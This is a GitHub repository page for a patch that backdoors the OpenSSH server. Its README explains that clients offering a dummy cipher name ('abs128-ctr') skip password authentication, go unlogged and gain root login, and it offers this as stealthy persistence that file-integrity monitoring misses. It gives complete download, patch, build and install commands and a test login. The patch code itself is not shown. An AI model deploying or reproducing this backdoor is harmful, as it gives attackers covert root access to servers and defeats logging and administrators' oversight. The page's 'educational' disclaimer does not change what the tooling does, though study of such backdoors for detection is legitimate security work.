Skip to content
/ openssh-backdoor Public

Experimental and sneaky backdoor patch for OpenSSH Portable.

17 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Psmths/openssh-backdoor

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
README.md
README.md
 
 
auth-passwd.c.patch
auth-passwd.c.patch
 
 
auth.c.patch
auth.c.patch
 
 
cipher.c.patch
cipher.c.patch
 
 
kex.c.patch
kex.c.patch
 
 
kex.h.patch
kex.h.patch
 
 
packet.c.patch
packet.c.patch
 
 
packet.h.patch
packet.h.patch
 
 
servconf.c.patch
servconf.c.patch
 
 

Repository files navigation

openssh-backdoor

Experimental backdoor for OpenSSH Portable. Patch for OpenSSH Portable v8.8_p1. For educational/ethical purposes only!

Why?

Consider using this method when you want persistence, but:

  • FIM is monitoring configuration files, but not binaries
  • You don't want to create a new backdoor user
  • You don't want to deploy a reverse shell

How does it work?

This repo contains a patch for OpenSSH (server and client) to allow for a complete authentication bypass without modifying configuration files on the target server, adding new users, overwriting credentials, or deploying an implant such as a reverse shell.

The patch creates a dummy cipher suite, in this case abs128-ctr that functions as an activation phrase. Any client that sends this dummy cipher spec during the SSH algorithm negotiation will completely bypass PASSWD authentication on the patched server, and will also bypass authentication logging. Clients connecting with normal cipher specs will authenticate as normal.

Additionally, the patch overrides PermitRootLogin, allowing clients sending the activation phrase to login as root regardless of the OpenSSH server's restriction.

Installation and Patching

The following commands when issued will patch OpenSSH and produce a modified ssh client in /tmp/ssh and a modified server binary in /tmp/sshd.

wget https://github.com/openssh/openssh-portable/archive/refs/tags/V_8_8_P1.tar.gz
gunzip V_8_8_P1.tar.gz
tar xvf V_8_8_P1.tar
git clone https://github.com/Psmths/openssh-backdoor
cp ./openssh-backdoor/*.patch ./openssh-portable-V_8_8_P1/
cd openssh-portable-V_8_8_P1/
patch -u auth-passwd.c -i auth-passwd.c.patch
patch -u auth.c -i auth.c.patch
patch -u cipher.c -i cipher.c.patch 
patch -u kex.c -i kex.c.patch
patch -u kex.h -i kex.h.patch
patch -u packet.h -i packet.h.patch
patch -u packet.c -i packet.c.patch
patch -u servconf.c -i servconf.c.patch
autoreconf
./configure --bindir=/tmp/ --sbindir=/tmp/
make -j 24
sudo make install

To test, run the modified server binary and set it to listen on some port:

sudo /tmp/sshd -p 9001

Attempt to authenticate without the special cipher suite string, and a bogus password. This should fail.

/tmp/ssh [email protected] -p 9001 -c "[email protected]"

Attempt to authenticate with the special cipher suite string, in this case abs128-ctr, and a bogus password. This should seccessfully authenticate you as root. The backdoor authentication will not be logged either during login or logout.

/tmp/ssh [email protected] -p 9001 -c "abs128-ctr,[email protected]"

About

Experimental and sneaky backdoor patch for OpenSSH Portable.

Topics

ssh backdoor ssh-server pentesting openssh patch red-team pentesting-tools backdoor-attacks

Resources

Readme
Activity

Stars

17 stars

Watchers

3 watching

Forks

7 forks
Report repository

Releases 1

OpenSSH V8.8-P1 Latest
Dec 21, 2021